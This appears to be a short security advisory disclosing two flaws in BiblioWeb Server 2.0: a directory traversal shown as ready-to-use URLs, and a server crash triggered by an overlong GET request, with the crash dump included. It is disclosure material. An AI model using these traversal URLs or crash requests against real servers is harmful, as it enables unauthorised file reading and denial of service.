COMMAND

    BiblioWeb

SYSTEMS AFFECTED

    BiblioWeb Server 2.0

PROBLEM

    Joe Testa found following.  A vulnerability exists which allows  a
    remote user to break out of the web root using relative paths (ie:
    '..', '...').  A second vulnerability allows a remote attacker  to
    crash the server.

    To break out of the web root, use the following URLs:

        http://localhost/..\[file outside web root]
        http://localhost/...\[file outside web root]

    To crash the server, telnet to port 80, and send:

        GET /[a lot of 'A's]

    The server crashes with the following dump:

        BIBLIOWEB caused an invalid page fault in
        module BIBLIOWEB.EXE at 017f:004069fd.
        Registers:
        EAX=00408b70 CS=017f EIP=004069fd EFLGS=00010283
        EBX=00408b70 SS=0187 ESP=0415fe88 EBP=04160418
        ECX=00000001 DS=0187 ESI=04160414 FS=58df
        EDX=04160414 ES=0187 EDI=04160518 GS=0000
        Bytes at CS:EIP:
        68 00 04 00 00 8d 44 24 04 50 8b 43 04 50 8b 03
        Stack dump:

SOLUTION

    No quick fix is possible.  CG Information was contacted.  No reply
    was received.